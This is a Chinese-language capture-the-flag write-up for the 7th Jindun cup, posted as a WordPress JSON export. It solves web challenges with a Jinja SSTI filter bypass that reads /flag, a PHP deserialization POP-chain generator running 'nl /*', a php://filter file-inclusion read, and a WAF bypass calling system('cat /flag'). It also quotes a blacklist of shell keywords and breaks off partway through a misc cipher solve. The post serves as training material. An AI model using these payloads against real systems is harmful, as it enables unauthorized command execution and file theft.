{"id":2070,"date":"2025-12-27T20:45:56","date_gmt":"2025-12-27T12:45:56","guid":{"rendered":"https:\/\/www.sanjiuctf.cn\/?p=2070"},"modified":"2026-01-06T19:08:45","modified_gmt":"2026-01-06T11:08:45","slug":"%e7%ac%ac%e4%b8%83%e5%b1%8a%e9%87%91%e7%9b%be%e4%bf%a1%e5%ae%89%e6%9d%af2025-12-20wp","status":"publish","type":"post","link":"https:\/\/www.sanjiuctf.cn\/?p=2070","title":{"rendered":"\u7b2c\u4e03\u5c4a\u91d1\u76fe\u4fe1\u5b89\u676f2025.12.20wp"},"content":{"rendered":"\n

\u524d\u8a00<\/h2>\n\n\n\n

\u53cd\u6b63\u91cd\u8d5b\u4e86\u4e3e\u529e\u65b9\u6570\u636e\u5e93\u6ca1\u6709\u4e86\uff0c\u771f\u65e0\u8bed 12\u670827\u91cd\u8d5b<\/p>\n\n\n\n

\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n

Web<\/h2>\n\n\n\n

web-ssti<\/h3>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n

\u6839\u636e\u63d0\u793a\u770b\u51fa\u662f\u6a21\u677f\u6ce8\u5165<\/p>\n\n\n\n

\"\"<\/div><\/figure>\n\n\n\n

\u7528__subclasses__()<\/code>\u83b7\u53d6\u6240\u6709\u7684\u5b50\u7c7b<\/p>\n\n\n\n

\"\"<\/div><\/figure>\n\n\n\n

subclasses\u88ab\u8fc7\u6ee4\u4e86<\/p>\n\n\n\n

\u7ed5\u8fc7\u4e00\u4e0b<\/p>\n\n\n\n

{{%20().__class__.__base__[(%27__sub%27+%27classes__%27)]()}}<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u5f97\u5230\u4fe1\u606f<\/p>\n\n\n\n
\u627e\u53ef\u7528\u7684<\/p>\n\n\n\n
\u5229\u7528 catch_warnings<\/code> \u8bfb \/flag<\/code><\/p>\n\n\n\n
{{%20().__class__.__base__[(%27__sub%27+%27classes__%27)]()[202].__init__.__globals__.__builtins__[%27open%27](%27\/flag%27)|read}}<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u4f46read\u88ab\u8fc7\u6ee4\uff0c\u6362\u4e00\u4e2a\u8bfb\u53d6<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u62ff\u5230flag<\/p>\n\n\n\n
flag{5fa6f925-592d-46ce-bb5d-9ffd2e6b423c}<\/code><\/pre>\n\n\n\n
web-taoser<\/h3>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
<?php\n\/\/ index.php\n\nclass EntryPoint\n{\n    public $next;\n    public $method = 'trigger';\n\n    function __wakeup()\n    {\n        if (isset($this->next) && is_object($this->next)) {\n            $method = $this->method;\n            $this->next->{$method}('start_chain');\n        }\n    }\n}\n\nclass ChainLink\n{\n    public $handler;\n    public $params = [];\n\n    function __call($name, $args)\n    {\n        if (isset($this->handler) && is_object($this->handler)) {\n            $ref = new ReflectionMethod($this->handler, '__invoke');\n            $ref->invokeArgs($this->handler, $this->params);\n        }\n    }\n}\n\nclass Executor\n{\n    public $cmd = '';\n    public $output = '';\n\n    function __invoke()\n    {\n        if (strlen($this->cmd) < 7) {\n            ob_start();\n            passthru($this->cmd);\n            $this->output = ob_get_clean();\n        }\n    }\n\n    function __destruct()\n    {\n        echo (string) $this;\n    }\n\n    function __toString()\n    {\n        return $this->output;\n    }\n}\n\nfunction filter_input_custom($data)\n{\n    $blacklist = [\n        '#system#i',\n        '#exec#',\n        '#shell#i',\n        '#cat#i',\n        '#&#',\n        '#|#',\n        '#flag#i'\n    ];\n\n    foreach ($blacklist as $pattern) {\n        $data = preg_replace($pattern, '', $data);\n    }\n\n    return $data;\n}\n\nif (isset($_POST['data'])) {\n    $input = base64_decode($_POST['data'], true);\n    if ($input === false) {\n        echo \"Base64 decode error.\";\n        exit;\n    }\n\n    $input = filter_input_custom($input);\n    $obj = @unserialize($input);\n} else {\n    highlight_file(__FILE__);\n}<\/code><\/pre>\n\n\n\n
\u7528\u811a\u672c\u53cd\u5e8f\u5217\u5316<\/p>\n\n\n\n
<?php\nclass EntryPoint {\n    public $next;\n    public $method = 'trigger';\n}\n\nclass ChainLink {\n    public $handler;\n    public $params = [];\n}\n\nclass Executor {\n    public $cmd = 'nl \/*';\n    public $output = '';\n}\n\n$objs = [\n    'exec' => new Executor(),\n    'link' => new ChainLink(),\n    'entry' => new EntryPoint()\n];\n\n$objs['link']->handler = $objs['exec'];\n$objs['entry']->next = $objs['link'];\n\necho base64_encode(serialize($objs['entry']));\n?><\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
TzoxMDoiRW50cnlQb2ludCI6Mjp7czo0OiJuZXh0IjtPOjk6IkNoYWluTGluayI6Mjp7czo3OiJoYW5kbGVyIjtPOjg6IkV4ZWN1dG9yIjoyOntzOjM6ImNtZCI7czo1OiJubCAvKiI7czo2OiJvdXRwdXQiO3M6MDoiIjt9czo2OiJwYXJhbXMiO2E6MDp7fX1zOjY6Im1ldGhvZCI7czo3OiJ0cmlnZ2VyIjt9<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u62ff\u5230flag<\/p>\n\n\n\n
flag{6b0a2fb0-c782-467a-9f86-a85d617f66cb}<\/code><\/pre>\n\n\n\n
web-pop<\/h3>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
<?php\nhighlight_file(__FILE__);\nerror_reporting(0);\n\nrequire_once('flag.php');  \/\/   usr\/share\/nginx\/html\n\n$win = $_GET['win'];\nif(isset($win))\n{\n    require_once($win);     \/\/  hint.php\n}\nelse\n{\n    echo $hint;\n}<\/code><\/pre>\n\n\n\n
\u6839\u636e\u63d0\u4f9b\u7684PHP\u4ee3\u7801\uff0c\u6211\u4eec\u53ef\u4ee5\u5229\u7528require_once($win)<\/code>\u4e2d\u7684\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e\u6765\u8bfb\u53d6flag.php<\/code>\u7684\u6e90\u4ee3\u7801\u3002\u4f7f\u7528php:\/\/filter<\/code>\u5305\u88c5\u5668\u5c06flag.php<\/code>\u7684\u5185\u5bb9\u4ee5base64\u7f16\u7801\u7684\u5f62\u5f0f\u8f93\u51fa\uff0c\u7136\u540e\u89e3\u7801\u5373\u53ef\u83b7\u5f97flag\u3002<\/p>\n\n\n\n
?win=php:\/\/filter\/read=convert.base64-encode\/resource=\/flag<\/code><\/pre>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u62ff\u5230flag<\/p>\n\n\n\n
flag{29f7b8de-ba85-40d6-84bf-c878d9a6a28d}<\/code><\/pre>\n\n\n\n
web-bagua<\/h3>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u6839\u636e\u516b\u5366\u4e94\u884c\u76f8\u751f\u76f8\u514b<\/p>\n\n\n\n
\u62ff\u5230\u4ee4\u724c<\/p>\n\n\n\n
\u5c1d\u8bd5\u547d\u4ee4\u6267\u884c<\/p>\n\n\n\n
\u6709waf<\/p>\n\n\n\n
\u7f16\u5199payload\u7ed5\u8fc7<\/p>\n\n\n\n
('system')('cat \/flag')<\/code><\/pre>\n\n\n\n
\u5f97\u51fa<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
flag{12017d3d-c339-4a00-b59c-342d553fc8a1}<\/code><\/pre>\n\n\n\n
web-\u9003\u5355<\/h3>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u5148\u6ce8\u518c\u4e2a\u7528\u6237<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u770b\u51fa\u6765\u662f\u5e76\u53d1\u6f0f\u6d1e<\/p>\n\n\n\n
\u53d1\u5230\u91cd\u653e\u5668\u5e76\u53d1<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
flag{893f18a9-6db4-43e8-9f70-d9388c4855e0}<\/code><\/pre>\n\n\n\n
Misc<\/h2>\n\n\n\n
\u4e71\u4e03\u516b\u906d\u7684\u610f\u5473<\/h3>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
\u4f55\u610f\u5473.png \u8fd9\u4e2a\u56fe\u7247\u4fee\u6539\u5bbd\u9ad8<\/p>\n\n\n\n
\"\"<\/div><\/figure>\n\n\n\n
awdssa.dss.dsasd.asdsa.assdwa.ss.<\/p>\n\n\n\n
\u952e\u76d8\u7b14\u753b\u5bc6\u7801<\/p>\n\n\n\n
\u8fd9\u79cd\u5bc6\u7801\u5c06\u952e\u76d8\u4e0a\u7684 WASD<\/code> \u770b\u4f5c\u65b9\u5411\u952e\uff1a<\/p>\n\n\n\n